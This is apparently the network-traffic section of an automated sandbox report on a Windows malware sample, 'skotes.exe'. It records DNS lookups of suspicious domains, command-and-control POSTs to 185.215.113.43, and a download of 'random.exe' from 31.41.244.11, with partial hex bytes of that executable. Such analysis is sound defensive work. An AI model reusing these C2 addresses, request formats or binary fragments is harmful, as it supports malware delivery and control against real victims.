                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.724951982 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.724987030 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.725791931 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:12.039937019 CET192.168.2.61.1.1.10xfae2Standard query (0)drive-connect.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.671258926 CET192.168.2.61.1.1.10x696fStandard query (0)atten-supporse.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.628571033 CET192.168.2.61.1.1.10x9ecdStandard query (0)prod.classify-client.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.767272949 CET192.168.2.61.1.1.10x708dStandard query (0)prod.classify-client.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.112014055 CET192.168.2.61.1.1.10x38e0Standard query (0)youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.112320900 CET192.168.2.61.1.1.10x6ca2Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.250277996 CET192.168.2.61.1.1.10xecbbStandard query (0)youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.254740000 CET192.168.2.61.1.1.10x731cStandard query (0)prod.detectportal.prod.cloudops.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.390655041 CET192.168.2.61.1.1.10xe6dbStandard query (0)youtube.com28IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.393857002 CET192.168.2.61.1.1.10x34e6Standard query (0)prod.detectportal.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.350119114 CET192.168.2.61.1.1.10xbea2Standard query (0)contile.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.449080944 CET192.168.2.61.1.1.10xfa50Standard query (0)spocs.getpocket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.488486052 CET192.168.2.61.1.1.10xdc4bStandard query (0)contile.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.637600899 CET192.168.2.61.1.1.10x5272Standard query (0)contile.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.897444963 CET192.168.2.61.1.1.10x9651Standard query (0)prod.balrog.prod.cloudops.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.897602081 CET192.168.2.61.1.1.10x2aafStandard query (0)prod.ads.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.912178040 CET192.168.2.61.1.1.10x6130Standard query (0)example.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.973774910 CET192.168.2.61.1.1.10xad12Standard query (0)ipv4only.arpaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.979374886 CET192.168.2.61.1.1.10xc5b3Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.981426954 CET192.168.2.61.1.1.10x6c38Standard query (0)content-signature-2.cdn.mozilla.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.035849094 CET192.168.2.61.1.1.10x9a7dStandard query (0)prod.balrog.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.036608934 CET192.168.2.61.1.1.10x1825Standard query (0)prod.ads.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.120121956 CET192.168.2.61.1.1.10xc306Standard query (0)prod.content-signature-chains.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.263200998 CET192.168.2.61.1.1.10xdb2aStandard query (0)prod.content-signature-chains.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:16.136914015 CET192.168.2.61.1.1.10xed66Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:16.137068033 CET192.168.2.61.1.1.10xe1eeStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:18.397699118 CET192.168.2.61.1.1.10xb507Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:18.397804022 CET192.168.2.61.1.1.10xa777Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:12.263349056 CET1.1.1.1192.168.2.60xfae2No error (0)drive-connect.cyou172.67.139.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:12.263349056 CET1.1.1.1192.168.2.60xfae2No error (0)drive-connect.cyou104.21.79.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.905487061 CET1.1.1.1192.168.2.60x696fNo error (0)atten-supporse.biz104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.905487061 CET1.1.1.1192.168.2.60x696fNo error (0)atten-supporse.biz104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.905487061 CET1.1.1.1192.168.2.60x696fNo error (0)atten-supporse.biz104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.905487061 CET1.1.1.1192.168.2.60x696fNo error (0)atten-supporse.biz104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.905487061 CET1.1.1.1192.168.2.60x696fNo error (0)atten-supporse.biz104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.905487061 CET1.1.1.1192.168.2.60x696fNo error (0)atten-supporse.biz104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.905487061 CET1.1.1.1192.168.2.60x696fNo error (0)atten-supporse.biz104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.607438087 CET1.1.1.1192.168.2.60x3b78No error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.766360044 CET1.1.1.1192.168.2.60x9ecdNo error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.248886108 CET1.1.1.1192.168.2.60x38e0No error (0)youtube.com142.250.181.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.249999046 CET1.1.1.1192.168.2.60x6ca2No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.249999046 CET1.1.1.1192.168.2.60x6ca2No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.388097048 CET1.1.1.1192.168.2.60xecbbNo error (0)youtube.com142.250.181.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.392147064 CET1.1.1.1192.168.2.60x731cNo error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.527519941 CET1.1.1.1192.168.2.60xe6dbNo error (0)youtube.com28IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:56.530467033 CET1.1.1.1192.168.2.60x34e6No error (0)prod.detectportal.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.486830950 CET1.1.1.1192.168.2.60xbea2No error (0)contile.services.mozilla.com34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.576780081 CET1.1.1.1192.168.2.60x718dNo error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.576780081 CET1.1.1.1192.168.2.60x718dNo error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.586013079 CET1.1.1.1192.168.2.60xfa50No error (0)spocs.getpocket.comprod.ads.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.586013079 CET1.1.1.1192.168.2.60xfa50No error (0)prod.ads.prod.webservices.mozgcp.net34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.627319098 CET1.1.1.1192.168.2.60xdc4bNo error (0)contile.services.mozilla.com34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.034034967 CET1.1.1.1192.168.2.60x9651No error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.034953117 CET1.1.1.1192.168.2.60x2aafNo error (0)prod.ads.prod.webservices.mozgcp.net34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.048986912 CET1.1.1.1192.168.2.60x6130No error (0)example.org93.184.215.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.110718966 CET1.1.1.1192.168.2.60xad12No error (0)ipv4only.arpa192.0.0.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.110718966 CET1.1.1.1192.168.2.60xad12No error (0)ipv4only.arpa192.0.0.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.116167068 CET1.1.1.1192.168.2.60xc5b3No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.116167068 CET1.1.1.1192.168.2.60xc5b3No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.118678093 CET1.1.1.1192.168.2.60x6c38No error (0)content-signature-2.cdn.mozilla.netcontent-signature-chains.prod.autograph.services.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.118678093 CET1.1.1.1192.168.2.60x6c38No error (0)content-signature-chains.prod.autograph.services.mozaws.netprod.content-signature-chains.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.118678093 CET1.1.1.1192.168.2.60x6c38No error (0)prod.content-signature-chains.prod.webservices.mozgcp.net34.160.144.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.257320881 CET1.1.1.1192.168.2.60xc306No error (0)prod.content-signature-chains.prod.webservices.mozgcp.net34.160.144.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:58.400665998 CET1.1.1.1192.168.2.60xdb2aNo error (0)prod.content-signature-chains.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:16.274521112 CET1.1.1.1192.168.2.60xe1eeNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:16.274823904 CET1.1.1.1192.168.2.60xed66No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:18.652663946 CET1.1.1.1192.168.2.60xb507No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:18.652663946 CET1.1.1.1192.168.2.60xb507No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:18.652663946 CET1.1.1.1192.168.2.60xb507No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:18.652663946 CET1.1.1.1192.168.2.60xb507No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:18.793014050 CET1.1.1.1192.168.2.60xed57No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:18.898966074 CET1.1.1.1192.168.2.60xaa35No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:18.898966074 CET1.1.1.1192.168.2.60xaa35No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:18.898966074 CET1.1.1.1192.168.2.60xaa35No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:19.094491005 CET1.1.1.1192.168.2.60xa777No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:19.094491005 CET1.1.1.1192.168.2.60xa777No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:21.534964085 CET1.1.1.1192.168.2.60x9c31No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:21.535433054 CET1.1.1.1192.168.2.60xab15No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:21.535433054 CET1.1.1.1192.168.2.60xab15No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 9, 2024 21:10:21.535433054 CET1.1.1.1192.168.2.60xab15No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            0192.168.2.649848185.215.113.43805156C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:03.831336021 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:05.209419966 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:04 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            1192.168.2.649854185.215.113.43805156C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:06.836569071 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                            Content-Length: 160
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:08.199217081 CET746INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:07 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Data Raw: 32 32 62 0d 0a 20 3c 63 3e 31 30 31 33 35 30 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 39 37 65 39 63 34 35 34 33 62 33 31 64 65 31 35 34 34 31 23 31 30 31 33 35 31 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 65 37 31 39 62 35 30 35 39 62 62 30 31 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 31 30 31 33 35 31 31 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 33 35 31 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 [TRUNCATED]
                                                                                                                                                                                                                                            Data Ascii: 22b <c>1013509001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbd97e9c4543b31de15441#1013510001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb01ab5e45425197d1aa1daaa8#1013511001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1013512001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1013513001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1013514001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            2192.168.2.64985931.41.244.11805156C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:08.323261976 CET54OUTGET /files/random.exe HTTP/1.1
                                                                                                                                                                                                                                            Host: 31.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655523062 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:09 GMT
                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                            Content-Length: 828416
                                                                                                                                                                                                                                            Last-Modified: Mon, 09 Dec 2024 19:37:50 GMT
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            ETag: "6757470e-ca400"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 08 00 8d fe 56 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a0 02 00 00 e0 00 00 00 00 00 00 72 e5 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 0c 00 00 08 00 00 a9 ae 0c 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 3c 03 00 3c 00 00 00 00 a0 03 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 03 00 88 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 ff 02 00 18 00 00 00 88 c2 02 00 c0 00 00 00 00 00 00 00 00 00 00 00 94 3e [TRUNCATED]
                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELVgr@@<<>x.text `.rdata<@@.data'`L@.TLSd@.rsrcf@@.reloc h@B.bss@.bss`@
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655586004 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655596972 CET1236INData Raw: 01 e7 83 c7 1c eb 6b 66 66 66 2e 0f 1f 84 00 00 00 00 00 89 f8 83 c8 0f 83 f8 17 bd 16 00 00 00 0f 43 e8 3d ff 0f 00 00 72 19 8d 45 24 50 e8 2b 87 00 00 83 c4 04 8d 58 23 83 e3 e0 89 43 fc eb 10 66 90 8d 45 01 50 e8 12 87 00 00 83 c4 04 89 c3 89
                                                                                                                                                                                                                                            Data Ascii: kfff.C=rE$P+X#CfEP\$|$,l$0WVS^l$t$L$D$,5|$0|$C}L$1tE1i[1i[i[1iL[1i[i[19u
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655734062 CET1236INData Raw: 83 7c 03 0c 00 0f 85 7a 01 00 00 b9 c0 01 00 00 23 4c 03 14 83 f9 40 0f 84 94 00 00 00 83 7c 24 04 01 89 e9 83 d9 00 0f 8c 84 00 00 00 bb 01 00 00 00 eb 36 66 66 2e 0f 1f 84 00 00 00 00 00 0f b6 c0 8b 11 50 ff 52 0c 83 f8 ff 0f 84 14 01 00 00 89
                                                                                                                                                                                                                                            Data Ascii: |z#L@|$6ff.PR9}4T$@@L8D@Q :tQ0*~M*I j)D$@@D$1\$@L8jt$Vt$LP$11$||$|p
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655922890 CET896INData Raw: 8b 4c 06 38 85 c9 74 05 8b 01 ff 50 08 8b 4c 24 1c 31 e1 e8 12 7e 00 00 89 f0 83 c4 20 5e 5f 5b c2 04 00 a8 02 b9 cb 05 43 00 ba b5 05 43 00 0f 44 d1 a8 04 bf e0 05 43 00 0f 44 fa 89 e3 6a 01 53 e8 95 16 00 00 83 c4 08 8d 74 24 08 89 f1 53 57 e8
                                                                                                                                                                                                                                            Data Ascii: L8tPL$1~ ^_[CCDCDjSt$SWhHCV4UWVu}iC1Ehmd5TwC(EUjh`ChIh`CjhBWVh5TwCMQj@hIh`CuM
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655936003 CET1236INData Raw: 5b 31 f7 89 c3 83 e3 fc 83 e0 03 31 f6 83 f8 01 74 1c 83 f8 02 74 0d 83 f8 03 75 20 0f be 74 1a 02 c1 e6 10 0f be 44 1a 01 c1 e0 08 31 c6 0f be 04 1a 31 f0 69 c0 95 e9 d1 5b 31 c7 8b 44 24 08 83 f8 10 8d 5c 24 20 8b 74 24 0c 72 2f 8d 50 01 81 fa
                                                                                                                                                                                                                                            Data Ascii: [11ttu tD11i[1D$\$ t$r/PrA) T$$RQy1i[1TWL$FD$F$UyW>CD$$4$t$L$81y
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655953884 CET1236INData Raw: f3 00 00 83 c4 18 89 c6 8b 4c 24 04 31 e1 e8 c3 75 00 00 89 f0 83 c4 08 5e 5f 5b c3 cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 38 8b 74 24 4c a1 00 69 43 00 31 e0 89 44 24 34 ff 74 24 50 e8 91 65 01 00 83 c4 04 89 f2 8b 0e 89 4c 24 04 8b
                                                                                                                                                                                                                                            Data Ascii: L$1u^_[USWV8t$LiC1D$4t$PeL$ql2 \2$19|$L$)\$EL$ET$L78tPD$p|7tD$L7<t9tp|7D70HL$
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655973911 CET448INData Raw: 0f 10 4c 24 24 f2 0f 11 4c 24 04 f2 0f 11 44 24 14 89 54 24 10 89 4c 24 0c 8d 4c 24 1c 89 0c 24 89 f9 ff 50 14 0f b6 3c 24 c1 e7 02 8b 16 8b 4a 04 8b 44 0e 0c 31 d2 83 7c 0e 38 00 0f 94 c2 c1 e2 02 83 e0 17 09 f8 09 d0 89 44 0e 0c 23 44 0e 10 75
                                                                                                                                                                                                                                            Data Ascii: L$$L$D$T$L$L$$P<$JD1|8D#Du8u`@L8tPL$1p ^_[CCDCDjSt$SWehHCVhwCUSWV|$$iC
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.656171083 CET1236INData Raw: c4 10 5e 5f 5b 5d c3 e8 27 02 00 00 cc cc cc cc cc cc cc 53 57 56 83 ec 20 89 ce a1 00 69 43 00 31 e0 89 44 24 1c 8b 01 8b 40 04 8b 7c 01 38 85 ff 0f 84 87 00 00 00 8b 07 89 f9 ff 50 04 8b 06 8b 40 04 83 7c 06 0c 00 75 52 8b 4c 06 3c 85 c9 74 15
                                                                                                                                                                                                                                            Data Ascii: ^_[]'SWV iC1D$@|8P@|uRL<t9t@|u5P4IT|8D#Du6uW@L8tPL$1yn ^_[CCDCDjS
